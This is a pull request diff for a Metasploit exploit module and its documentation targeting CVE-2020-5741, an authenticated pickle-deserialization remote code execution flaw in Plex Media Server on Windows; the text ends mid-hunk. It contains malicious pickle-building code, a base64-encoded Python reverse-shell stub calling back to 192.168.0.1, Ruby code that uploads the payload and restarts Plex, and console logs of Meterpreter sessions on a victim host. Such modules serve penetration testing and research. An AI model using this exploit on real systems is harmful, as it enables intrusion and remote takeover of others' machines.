### PR TITLE
CVE-2020-5741: Plex rce on Windows

### DIFF
--- a/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md
+++ b/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md
@@ -42,8 +42,11 @@ pickle.dumps(e)
 ```
 
 However, this was run on Linux and thus `posix` can be seen in the output.  When run
-on Windows, the output will be slightly different and use `nt` isntead of `posix`.
+on Windows, the output will be slightly different and use `nt` instead of `posix`.
 The Windows version of the code is required.
+
+Also note the length field as documented
+[here](https://github.com/rapid7/metasploit-framework/pull/13741#discussion_r445579648)
 
 ### Pickle Gotchas
 

--- a/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md
+++ b/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md
@@ -62,7 +62,7 @@ failed.  With this in mind, the strategy of uploading a payload file, and callin
 ## Verification Steps
 
   1. Install the application
-  2. Register/Connect it to your Plex Premium account
+  2. Register/Connect it to your Plex Pass account
   3. Start msfconsole
   4. Do: ```use windows/http/plex_unpickle_dict_rce```
   5. Do: ```run```

--- a/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md
+++ b/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md
@@ -13,6 +13,11 @@ If an exploit fails, or is cancelled, `Dict` and `Dict.bat` are
 left on disk, a new `ALBUM_NAME` will be required as subsuquent writes
 will make `Dict-1` and `Dict-1.bat`, and not execute.
 
+A vulnerable version of the software can be downloaded from
+[uptodown.com](https://plex-media-server.en.uptodown.com/windows/versions),
+specifically [1.18.5.2309](https://plex-media-server.en.uptodown.com/windows/download/2177216)
+is vulnerable and used for developing the module.
+
 ### Pickle Stub
 
 This exploit requires a python pickle file which can be generated with the following

--- a/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md
+++ b/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md
@@ -5,20 +5,18 @@ This module exploits an authenticated Python unsafe `pickle.load` of a
 add arbitrary files to it. After setting the Windows only Plex
 variable `LocalAppDataPath` to the newly created photo library, a file
 named `Dict` will be unpickled, which causes an RCE as the user who
-started Plex. Due to the restrictions of pickle RCE, we write our
-payload to a file then simply execute it through the pickled `Dict`
-file.
+started Plex.
 
-If an exploit fails, or is cancelled, `Dict` and `Dict.bat` are
+If an exploit fails, or is cancelled, `Dict` is
 left on disk, a new `ALBUM_NAME` will be required as subsuquent writes
-will make `Dict-1` and `Dict-1.bat`, and not execute.
+will make `Dict-1`, and not execute.
 
 A vulnerable version of the software can be downloaded from
 [uptodown.com](https://plex-media-server.en.uptodown.com/windows/versions),
 specifically [1.18.5.2309](https://plex-media-server.en.uptodown.com/windows/download/2177216)
 is vulnerable and used for developing the module.
 
-The plex server needs to be claimed by an account, and the module `PLEX_TOKEN` option
+The plex server needs to be claimed by an account (free is ok), and the module `PLEX_TOKEN` option
 needs permission to create a library, and upload files to it.
 
 ### Pickle Stub
@@ -28,26 +26,21 @@ code:
 
 ```
 import pickle
-import os
 
-class EvilPickle(object):
-  def __init__(self):
-    pass
-  def __reduce__(self):
-     return (os.system,('c:\\Users\\Public\\mememe\\Dict.bat',))
+class EP(object):
+    def __init__(self):
+        pass
+    def __reduce__(self):
+        # for generating an approximately correct size and content, we use
+        # msfvenom -p python/meterpreter/reverse_tcp LPORT=9999 LHOST=192.168.0.1
+        # that payload is then added after runsource.
+        # The original pre-meterp return would be
+        # return (eval, ("__import__('code').InteractiveInterpreter().runsource(, '<input>', 'exec')",))
+        return (eval, ("__import__('code').InteractiveInterpreter().runsource(\"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4xJyw5OTk5KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')[0]))\", '<input>', 'exec')",))
 
-e = EvilPickle()
+e = EP()
 pickle.dumps(e)
-"cposix\nsystem\np0\n(S'c:\\\\Users\\\\Public\\\\mememe\\\\Dict.bat'\np1\ntp2\nRp3\n."
 ```
-
-However, this was run on Linux and thus `posix` can be seen in the output.  When run
-on Windows, the output will be slightly different and use `nt` instead of `posix`.
-The Windows version of the code is required.
-
-Also note the length field as documented
-[here](https://github.com/rapid7/metasploit-framework/pull/13741#discussion_r445579648)
-
 ### Pickle Gotchas
 
 All the examples of Evil Pickle attacks seem to call one command/function.
@@ -56,19 +49,25 @@ All the examples of Evil Pickle attacks seem to call one command/function.
 [3](https://blog.nelhage.com/2011/03/exploiting-pickle/),
 [4](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)
 
-Either due to the pickling, or the HTTP server interaction, or running on Windows, all attempts to either call multi-function such as:
-```eval(base64.b64decode())```
-or execute OS commands with more than one parameter
-```os.system('net user...')```
-or
-```os.system('powershell.exe ...')```
-failed.  With this in mind, the strategy of uploading a payload file, and calling it was the one that worked.
+However, @acammack-r7 suggested a way around this. using the `InteractiveInterpreter`.
+Credit to them for this original code:
 
+```
+>>> class Bad(object):
+...      def __reduce__(self):
+...              return (eval, ("__import__('code').InteractiveInterpreter().runsource(\"print('ok')\", '<input>', 'exec')",))
+... 
+>>> x = Bad()
+>>> s = pickle.dumps(x)
+>>> pickle.loads(s)
+ok
+False
+```
 
 ## Verification Steps
 
   1. Install the application
-  2. Register/Connect it to your Plex Pass account
+  2. Register/Connect it to a Plex account (Free or Plex Pass)
   3. Start msfconsole
   4. Do: ```use windows/http/plex_unpickle_dict_rce```
   5. Do: ```run```
@@ -98,76 +97,51 @@ or by following [this comment](https://github.com/rapid7/metasploit-framework/pu
 
 Amount of seconds to sleep waiting on the server to reboot.  In testing `10` seemed to be OK, default is `15`.
 
-### PAYLOAD
-
-Payload is extremly picky, from testing only `cmd/windows/reverse_powershell` worked, however it was very reliable.
-
 ## Scenarios
 
 ### Plex 10.0.16299 on Windows 10 16299
 
-  ```
-  [*] Processing plex.rb for ERB directives.
-  resource (plex.rb)> use exploit/windows/http/plex_unpickle_dict_rce
-  resource (plex.rb)> set rhosts 1.1.1.1
-  rhosts => 1.1.1.1
-  resource (plex.rb)> set lhost 2.2.2.2
-  lhost => 2.2.2.2
-  resource (plex.rb)> set PLEX_TOKEN jy4g8mz2cmHbAaPBsEG7
-  PLEX_TOKEN => jy4g8mz2cmHbAaPBsEG7
-  resource (plex.rb)> set verbose true
-  verbose => true
-  resource (plex.rb)> exploit
-  [*] Started reverse TCP handler on 2.2.2.2:4444 
-  [*] Gathering Plex Config
-  [*] Server Name: EXPLOITABLE -win10
-  [+] Server OS: Windows (10.0 (Build 16299))
-  [+] Server Version: 1.18.5.2309-f5213a238
-  [*] Adding new photo library
-  [+] Created Photo Library: 94
-  [*] Adding pickled Dict to library
-  [*] Adding payload to library root
-  [*] Changing AppPath
-  [*] Restarting Plex
-  [*] Sleeping 10 seconds for server restart
-  [*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:57277) at 2020-06-19 23:32:00 -0400
-  [*] Cleanup Phase: Reverting changes from exploitation
-  [*] Changing AppPath
-  [*] Restarting Plex
-  [!] Tried to delete C:\Users\Public\ULTTqY\Plex Media Server\Plug-in Support\Data\com.plexapp.system\Dict, unknown result
-  [*] Deleting Photo Library
-  [!] Tried to delete C:\Users\Public\ULTTqY\Dict.bat, unknown result
-  
-  Could Not Find C:\Windows\.exe
-  
-  C:\Windows>background
-  
-  Background session 1? [y/N]  y 
-  ```
-
-  ```
-  msf5 exploit(windows/http/plex_unpickle_dict_rce) > sessions -u 1
-  [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
-  
-  [*] Upgrading session ID: 1
-  [*] Starting exploit/multi/handler
-  [*] Started reverse TCP handler on 2.2.2.2:4433 
-  msf5 exploit(windows/http/plex_unpickle_dict_rce) > 
-  [*] Sending stage (176195 bytes) to 1.1.1.1
-  [*] Meterpreter session 2 opened (2.2.2.2:4433 -> 1.1.1.1:57293) at 2020-06-19 23:33:43 -0400
-  [*] Stopping exploit/multi/handler
-  
-  msf5 exploit(windows/http/plex_unpickle_dict_rce) > sessions -i 2
-  [*] Starting interaction with 2...
-  
-  meterpreter > getuid
-  Server username: WIN10PROLICENSE\windows
-  meterpreter > sysinfo
-  Computer        : WIN10PROLICENSE
-  OS              : Windows 10 (10.0 Build 16299).
-  Architecture    : x64
-  System Language : en_US
-  Domain          : WORKGROUP
-  Logged On Users : 2
-  Meterpreter     : x86/windows
-  ```
+    ```
+    [*] Processing plex.rb for ERB directives.
+    resource (plex.rb)> use exploit/windows/http/plex_unpickle_dict_rce
+    resource (plex.rb)> set rhosts 2.2.2.2
+    rhosts => 2.2.2.2
+    resource (plex.rb)> set lhost 1.1.1.1
+    lhost => 1.1.1.1
+    resource (plex.rb)> set PLEX_TOKEN aa1g1aa3aaHbAtPBsEG7
+    PLEX_TOKEN => aa1g1aa3aaHbAtPBsEG7
+    resource (plex.rb)> set verbose true
+    verbose => true
+    msf5 exploit(windows/http/plex_unpickle_dict_rce) > exploit
+    
+    [*] Started reverse TCP handler on 1.1.1.1:4444
+    [*] Gathering Plex Config
+    [*] Server Name: EXPLOITABLE -win10
+    [+] Server OS: Windows (10.0 (Build 16299))
+    [+] Server Version: 1.18.5.2309-f5213a238
+    [+] Camera Upload: 1
+    [*] Using album name: TAtPGj
+    [*] Adding new photo library
+    [+] Created Photo Library: 163
+    [*] Adding pickled Dict to library
+    [*] Changing AppPath
+    [*] Restarting Plex
+    [*] Sending stage (53755 bytes) to 2.2.2.2
+    [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:51092) at 2020-07-03 14:13:08 -0400
+    [*] Sleeping 15 seconds for server restart
+    [*] Cleanup Phase: Reverting changes from exploitation
+    [*] Changing AppPath
+    [*] Restarting Plex
+    [*] Deleting Photo Library
+    
+    meterpreter > getuid
+    Server username: WIN10PROLICENSE\windows
+    meterpreter > sysinfo
+    Computer        : win10prolicensed
+    OS              : Windows 10 (Build 16299)
+    Architecture    : x64
+    System Language : en_US
+    Meterpreter     : python/windows
+    meterpreter > pwd
+    \\?\C:\Users\Public\TAtPGj\Plex Media Server\Plug-in Support\Data\com.plexapp.system
+    ```

--- a/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md
+++ b/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md
@@ -1,0 +1,157 @@
+## Vulnerable Application
+
+This module exploits an authenticated Python unsafe `pickle.load` of a
+`Dict` file. An authenticated attacker can create a photo library and
+add arbitrary files to it. After setting the Windows only Plex
+variable `LocalAppDataPath` to the newly created photo library, a file
+named `Dict` will be unpickled, which causes an RCE as the user who
+started Plex. Due to the restrictions of pickle RCE, we write our
+payload to a file then simply execute it through the pickled `Dict`
+file.
+
+If an exploit fails, or is cancelled, `Dict` and `Dict.bat` are
+left on disk, a new `ALBUM_NAME` will be required as subsuquent writes
+will make `Dict-1` and `Dict-1.bat`, and not execute.
+
+### Pickle Stub
+
+This exploit requires a python pickle file which can be generated with the following
+code:
+
+```
+import pickle
+import os
+
+class EvilPickle(object):
+  def __init__(self):
+    pass
+  def __reduce__(self):
+     return (os.system,('c:\\Users\\Public\\mememe\\Dict.bat',))
+
+e = EvilPickle()
+pickle.dumps(e)
+"cposix\nsystem\np0\n(S'c:\\\\Users\\\\Public\\\\mememe\\\\Dict.bat'\np1\ntp2\nRp3\n."
+```
+
+However, this was run on Linux and thus `posix` can be seen in the output.  When run
+on Windows, the output will be slightly different and use `nt` isntead of `posix`.
+The Windows version of the code is required.
+
+### Pickle Gotchas
+
+All the examples of Evil Pickle attacks seem to call one command/function.
+[1](https://github.com/fhightower/evil-pickle/blob/master/evil_pickle_writer.py#L17),
+[2](https://medium.com/@abhishek.dev.kumar.94/sour-pickle-insecure-deserialization-with-python-pickle-module-efa812c0d565),
+[3](https://blog.nelhage.com/2011/03/exploiting-pickle/),
+[4](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)
+
+Either due to the pickling, or the HTTP server interaction, or running on Windows, all attempts to either call multi-function such as:
+```eval(base64.b64decode())```
+or execute OS commands with more than one parameter
+```os.system('net user...')```
+or
+```os.system('powershell.exe ...')```
+failed.  With this in mind, the strategy of uploading a payload file, and calling it was the one that worked.
+
+
+## Verification Steps
+
+  1. Install the application
+  2. Register/Connect it to your Plex Premium account
+  3. Start msfconsole
+  4. Do: ```use windows/http/plex_unpickle_dict_rce```
+  5. Do: ```run```
+  6. You should get a shell.
+
+## Options
+
+### ALBUM_NAME
+
+Name of the photo album to create.  Default is random 6 character.
+
+### LIBRARY_PATH
+
+The path to write the photo library to.  Must be valid.  Default is `C:\\Users\\Public`
+
+### PLEX_TOKEN
+
+The `X-Plex-Token` value from requests from an authenticated session.  To obtain this, simply use a browser
+to log-in to the server, then check the requests for this header.
+
+### REBOOT_SLEEP
+
+Amount of seconds to sleep waiting on the server to reboot.  In testing `5` seemed to be OK, default is `10`.
+
+### PAYLOAD
+
+Payload is extremly picky, from testing only `cmd/windows/reverse_powershell` worked, however it was very reliable.
+
+## Scenarios
+
+### Plex 10.0.16299 on Windows 10 16299
+
+  ```
+  [*] Processing plex.rb for ERB directives.
+  resource (plex.rb)> use exploit/windows/http/plex_unpickle_dict_rce
+  resource (plex.rb)> set rhosts 1.1.1.1
+  rhosts => 1.1.1.1
+  resource (plex.rb)> set lhost 2.2.2.2
+  lhost => 2.2.2.2
+  resource (plex.rb)> set PLEX_TOKEN jy4g8mz2cmHbAaPBsEG7
+  PLEX_TOKEN => jy4g8mz2cmHbAaPBsEG7
+  resource (plex.rb)> set verbose true
+  verbose => true
+  resource (plex.rb)> exploit
+  [*] Started reverse TCP handler on 2.2.2.2:4444 
+  [*] Gathering Plex Config
+  [*] Server Name: EXPLOITABLE -win10
+  [+] Server OS: Windows (10.0 (Build 16299))
+  [+] Server Version: 1.18.5.2309-f5213a238
+  [*] Adding new photo library
+  [+] Created Photo Library: 94
+  [*] Adding pickled Dict to library
+  [*] Adding payload to library root
+  [*] Changing AppPath
+  [*] Restarting Plex
+  [*] Sleeping 10 seconds for server restart
+  [*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:57277) at 2020-06-19 23:32:00 -0400
+  [*] Cleanup Phase: Reverting changes from exploitation
+  [*] Changing AppPath
+  [*] Restarting Plex
+  [!] Tried to delete C:\Users\Public\ULTTqY\Plex Media Server\Plug-in Support\Data\com.plexapp.system\Dict, unknown result
+  [*] Deleting Photo Library
+  [!] Tried to delete C:\Users\Public\ULTTqY\Dict.bat, unknown result
+  
+  Could Not Find C:\Windows\.exe
+  
+  C:\Windows>background
+  
+  Background session 1? [y/N]  y 
+  ```
+
+  ```
+  msf5 exploit(windows/http/plex_unpickle_dict_rce) > sessions -u 1
+  [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
+  
+  [*] Upgrading session ID: 1
+  [*] Starting exploit/multi/handler
+  [*] Started reverse TCP handler on 2.2.2.2:4433 
+  msf5 exploit(windows/http/plex_unpickle_dict_rce) > 
+  [*] Sending stage (176195 bytes) to 1.1.1.1
+  [*] Meterpreter session 2 opened (2.2.2.2:4433 -> 1.1.1.1:57293) at 2020-06-19 23:33:43 -0400
+  [*] Stopping exploit/multi/handler
+  
+  msf5 exploit(windows/http/plex_unpickle_dict_rce) > sessions -i 2
+  [*] Starting interaction with 2...
+  
+  meterpreter > getuid
+  Server username: WIN10PROLICENSE\windows
+  meterpreter > sysinfo
+  Computer        : WIN10PROLICENSE
+  OS              : Windows 10 (10.0 Build 16299).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+  ```

--- a/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md
+++ b/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md
@@ -18,6 +18,9 @@ A vulnerable version of the software can be downloaded from
 specifically [1.18.5.2309](https://plex-media-server.en.uptodown.com/windows/download/2177216)
 is vulnerable and used for developing the module.
 
+The plex server needs to be claimed by an account, and the module `PLEX_TOKEN` option
+needs permission to create a library, and upload files to it.
+
 ### Pickle Stub
 
 This exploit requires a python pickle file which can be generated with the following
@@ -80,12 +83,17 @@ The path to write the photo library to.  Must be valid.  Default is `C:\\Users\\
 
 ### PLEX_TOKEN
 
-The `X-Plex-Token` value from requests from an authenticated session.  To obtain this, simply use a browser
-to log-in to the server, then check the requests for this header.
+The `X-Plex-Token` value from requests from an authenticated session.
+
+There are multiple ways to obtain this value.  The easiest is most likely opening the
+Console on your web browser (F12) and typing `window.localStorage.myPlexAccessToken`.
+However, it can also be obtained from
+[plex library files](https://support.plex.tv/articles/204059436-finding-an-authentication-token-x-plex-token/)
+or by following [this comment](https://github.com/rapid7/metasploit-framework/pull/13741#issuecomment-649076121)
 
 ### REBOOT_SLEEP
 
-Amount of seconds to sleep waiting on the server to reboot.  In testing `5` seemed to be OK, default is `10`.
+Amount of seconds to sleep waiting on the server to reboot.  In testing `10` seemed to be OK, default is `15`.
 
 ### PAYLOAD
 

--- a/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
+++ b/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
@@ -132,7 +132,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # 'c__builtin__\neval\np0\n(S\'__import__(\\\'code\\\').InteractiveInterpreter().runsource("exec(__import__(\\\'base64\\\').b64decode(__import__(\\\'codecs\\\').getencoder(\\\'utf-8\\\')(\\\'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4xJyw5OTk5KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==\\\')[0]))", \\\'<input>\\\', \\\'exec\\\')\'\np1\ntp2\nRp3\n.'
 
     p = %|c__builtin__\neval\np0\n(S\'|
-    p << %|__import__('code').InteractiveInterpreter().runsource("#{payload.encoded}", '<input>', 'exec')|.gsub("'", "\'")
+    p << %|__import__('code').InteractiveInterpreter().runsource("#{payload.encoded}", '<input>', 'exec')|.gsub("'", "\\\\'")
     p << %(\'\np1\ntp2\nRp3\n.) # rubocop changed the | to ( which to not match the last 2 lines...
     filename = "#{album_name}/Plex Media Server/Plug-in Support/Data/com.plexapp.system/"
 

--- a/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
+++ b/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('PLEX_TOKEN', [true, 'Admin Authenticated X-Plex-Token', '']),
         OptString.new('LIBRARY_PATH', [true, 'Path to write picture library to', 'C:\\Users\\Public']),
         OptString.new('ALBUM_NAME', [true, 'Name of Album', '']),
-        OptInt.new('REBOOT_SLEEP', [true, 'Time to wait for Plex to restart', 10])
+        OptInt.new('REBOOT_SLEEP', [true, 'Time to wait for Plex to restart', 15])
       ]
     )
   end
@@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     u = "type=13&sectionID=3&locationID=#{location}&createdAt=1171387901&filename=#{URI.encode_www_form_component(filename)}"
     # using raw here because the encodings for the filename got really wacky when using CGI
-    send_request_raw(
+    res = send_request_raw(
       'method' => 'POST',
       'uri' => "/library/metadata?#{u}Dict",
       'headers' => { 'X-Plex-Token' => datastore['PLEX_TOKEN'] },
@@ -146,10 +146,16 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_file_for_cleanup("#{datastore['LIBRARY_PATH']}\\#{filename.gsub('/', '\\\\')}Dict")
 
+    if res && res.code == 401
+      fail_with(Failure::UnexpectedReply, 'Permission denied when attempting to upload file.  Plex server may not be registered to an account or you lack permission.')
+      delete_photo_library(location)
+      return false
+    end
+
     print_status('Adding payload to library root')
     filename = "#{album_name}/"
     u = "type=13&sectionID=3&locationID=#{location}&createdAt=1171387901&filename=#{URI.encode_www_form_component(filename)}"
-    send_request_raw(
+    res = send_request_raw(
       'method' => 'POST',
       'uri' => "/library/metadata?#{u}Dict.bat", # Dict-1
       'headers' => { 'X-Plex-Token' => datastore['PLEX_TOKEN'] },
@@ -157,6 +163,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => payload.encoded
     )
     register_file_for_cleanup("#{datastore['LIBRARY_PATH']}\\#{filename.gsub('/', '\\\\')}Dict.bat")
+
+    if res && res.code == 401
+      fail_with(Failure::UnexpectedReply, 'Permission denied when attempting to upload file.  Plex server may not be registered to an account or you lack permission.')
+      delete_photo_library(location)
+      return false
+    end
+    true
   end
 
   def change_apppath(path)
@@ -251,7 +264,10 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, 'Unable to create photo library, possible permission problem')
     end
     print_good("Created Photo Library: #{id}")
-    add_pickle(id)
+    success = add_pickle(id)
+    unless success
+      fail_with(Failure::UnexpectedReply, 'Unable to upload files to library')
+    end
     change_apppath("#{datastore['LIBRARY_PATH']}\\#{album_name}")
     restart_plex
     print_status("Sleeping #{datastore['REBOOT_SLEEP']} seconds for server restart")

--- a/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
+++ b/modules/exploits/windows/http/plex_unpickle_dict_rce.rb
@@ -13,10 +13,10 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name'           => 'Plex Unpickle Dict Windows RCE',
-        'Description'    => %q(
-            This module exploits an authenticated Python unsafe pickle.load of a Dict file.  An authenticated attacker
-          can create a photo library and add arbitrary files to it.  After setting the Windows only Plex variable 
+        'Name' => 'Plex Unpickle Dict Windows RCE',
+        'Description' => %q{
+          This module exploits an authenticated Python unsafe pickle.load of a Dict file.  An authenticated attacker
+          can create a photo library and add arbitrary files to it.  After setting the Windows only Plex variable
           LocalAppDataPath to the newly created photo library, a file named Dict will be unpickled, which causes
           an RCE as the user who started Plex.  Due to the restrictions of pickle RCE, we write our payload to a file
           then simply execute it through the pickled Dict file.
@@ -24,52 +24,53 @@ class MetasploitModule < Msf::Exploit::Remote
           the X-Plex-Token header.
           If an exploit fails, or is cancelled, Dict and Dict.bat are left on disk, a new ALBUM_NAME will be required
           as subsuquent writes will make Dict-1 and Dict-1.bat, and not execute.
-        ),
-        'License'        => MSF_LICENSE,
-        'Author'         =>
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
           [
             'h00die', # msf module
             'Chris Lyne' # discovery, POC
           ],
-        'References'     =>
+        'References' =>
           [
             ['URL', 'https://github.com/tenable/poc/blob/master/plex/plex_media_server/auth_dict_unpickle_rce_exploit_tra_2020_32.py'],
             ['URL', 'https://www.tenable.com/security/research/tra-2020-32'],
             ['URL', 'http://support.plex.tv/articles/201105343-advanced-hidden-server-settings/'],
             ['CVE', '2020-5741']
           ],
-        'Platform'       => ['windows'],
-        'Privileged'     => false,
-        'Arch'           => [ARCH_CMD],
+        'Platform' => ['windows'],
+        'Privileged' => false,
+        'Arch' => [ARCH_CMD],
         'DefaultOptions' => {
-          'PAYLOAD' => 'cmd/windows/reverse_powershell'
+          'PAYLOAD' => 'cmd/windows/reverse_powershell' # only payload that seemed to work at all...
         },
         'Notes' => {
           'Stability' => [CRASH_SERVICE_RESTARTS], # we reboot the server twice
           'Reliability' => [REPEATABLE_SESSION, CONFIG_CHANGES], # we attempt to revert config changes
           'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
         },
-        'Targets'        =>
+        'Targets' =>
           [
             [ 'Automatic Target', {}]
           ],
-        'DisclosureDate' => "May 7 2020",
-        'DefaultTarget'  => 0
+        'DisclosureDate' => 'May 7 2020',
+        'DefaultTarget' => 0
       )
     )
     register_options(
       [
         Opt::RPORT(32400),
-        OptString.new('PLEX_TOKEN', [ true, 'Admin Authenticated X-Plex-Token', '']),
-        OptString.new('LIBRARY_PATH', [ true, 'Path to write picture library to', 'C:\\Users\\Public']),
-        OptString.new('ALBUM_NAME', [ true, 'Name of Album', ''])
+        OptString.new('PLEX_TOKEN', [true, 'Admin Authenticated X-Plex-Token', '']),
+        OptString.new('LIBRARY_PATH', [true, 'Path to write picture library to', 'C:\\Users\\Public']),
+        OptString.new('ALBUM_NAME', [true, 'Name of Album', '']),
+        OptInt.new('REBOOT_SLEEP', [true, 'Time to wait for Plex to restart', 10])
       ]
     )
   end
 
   def album_name
     if @album_name.nil?
-      @album_name = datastore['ALBUM_NAME'].blank? ? rand_text_alphanumeric(6..12) : datastore['ALBUM_NAME']
+      @album_name = datastore['ALBUM_NAME'].blank? ? rand_text_alphanumeric(6) : datastore['ALBUM_NAME']
     end
     @album_name
   end
@@ -81,17 +82,17 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => '/library/sections',
       'headers' =>
         {
-          'X-Plex-Token'=> datastore['PLEX_TOKEN'],
+          'X-Plex-Token' => datastore['PLEX_TOKEN'],
           'Accept' => 'application/json'
         },
-      'vars_get' => 
+      'vars_get' =>
         {
-          'name'=>album_name,
-          'language'=>'en',
-          'agent'=>'com.plexapp.agents.none',
-          'location'=> datastore['LIBRARY_PATH'],
-          'type'=>'photo',
-          'scanner'=>'Plex Photo Scanner'
+          'name' => album_name,
+          'language' => 'en',
+          'agent' => 'com.plexapp.agents.none',
+          'location' => datastore['LIBRARY_PATH'],
+          'type' => 'photo',
+          'scanner' => 'Plex Photo Scanner'
         }
     )
     # response:
@@ -100,29 +101,35 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code == 201 # 201 == Created
       return res.get_json_document['MediaContainer']['Directory'][0]['key']
     end
+
     nil
   end
 
   def add_pickle(location)
-    print_status('Adding evil Dict to library')
+    print_status('Adding pickled Dict to library')
     # pickle dump of os.system of a path with Dict.bat at the end.  MUST BE GENERATED ON WINDOWS
     # generating on *nix will use posix, and fail on target.
     # the path is arbitrary as it gets replaced
+    # This method is fragile.  After reviewing several examples, and write-ups, I wasn't
+    # able to get this working with more than 1 function call, and any spaces.  Not sure
+    # if the problem is the pickling, unpickling, or plex.  POC didn't would work with a
+    # trailing space, but no 2nd option.  To circumvent all this, we write our payload to
+    # Dict.bat, and just call it directly.
 
     #######
     # python
     #######
-    #import pickle
-    #import os
+    # import pickle
+    # import os
     #
-    #class EvilPickle(object):
+    # class EvilPickle(object):
     #  def __init__(self):
     #    pass
     #  def __reduce__(self):
     #    return (os.system,('c:\\Users\\Public\\mememe\\Dict.bat',))
     #
-    #e = EvilPickle()
-    #pickle.dumps(e)
+    # e = EvilPickle()
+    # pickle.dumps(e)
 
     p = "\x80\x02cnt\nsystem\nq\x00U\x1f#{datastore['LIBRARY_PATH']}\\#{album_name}\\Dict.batq\x01\x85q\x02Rq\x03."
     filename = "#{album_name}/Plex Media Server/Plug-in Support/Data/com.plexapp.system/"
@@ -132,11 +139,11 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_raw(
       'method' => 'POST',
       'uri' => "/library/metadata?#{u}Dict",
-      'headers' => {'X-Plex-Token'=> datastore['PLEX_TOKEN']},
+      'headers' => { 'X-Plex-Token' => datastore['PLEX_TOKEN'] },
       'ctype' => 'application/octet-stream',
       'data' => p
     )
-    register_file_for_cleanup("#{datastore['LIBRARY_PATH']}\\#{filename.gsub('/','\\\\')}Dict")
+    register_file_for_cleanup("#{datastore['LIBRARY_PATH']}\\#{filename.gsub('/', '\\\\')}Dict")
 
     print_status('Adding payload to library root')
     filename = "#{album_name}/"
@@ -144,24 +151,23 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_raw(
       'method' => 'POST',
       'uri' => "/library/metadata?#{u}Dict.bat", # Dict-1
-      'headers' => {'X-Plex-Token'=> datastore['PLEX_TOKEN']},
+      'headers' => { 'X-Plex-Token' => datastore['PLEX_TOKEN'] },
       'ctype' => 'application/octet-stream',
       'data' => payload.encoded
     )
-    register_file_for_cleanup("#{datastore['LIBRARY_PATH']}\\#{filename.gsub('/','\\\\')}Dict.bat")
-
+    register_file_for_cleanup("#{datastore['LIBRARY_PATH']}\\#{filename.gsub('/', '\\\\')}Dict.bat")
   end
 
-  def change_apppath(path) 
+  def change_apppath(path)
     print_status('Changing AppPath')
     send_request_cgi(
-      'method' => 'PUT',  
+      'method' => 'PUT',
       'uri' => '/:/prefs',
       'vars_get' =>
         {
-          'X-Plex-Token'=> datastore['PLEX_TOKEN'],
-          'LocalAppDataPath'=>path,
-        },
+          'X-Plex-Token' => datastore['PLEX_TOKEN'],
+          'LocalAppDataPath' => path
+        }
     )
   end
 
@@ -172,8 +178,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => '/:/plugins/com.plexapp.system/restart',
       'vars_get' =>
         {
-          'X-Plex-Token'=> datastore['PLEX_TOKEN'],
-        },
+          'X-Plex-Token' => datastore['PLEX_TOKEN']
+        }
     )
   end
 
@@ -184,25 +190,26 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => "/library/sections/#{library}",
       'vars_get' =>
         {
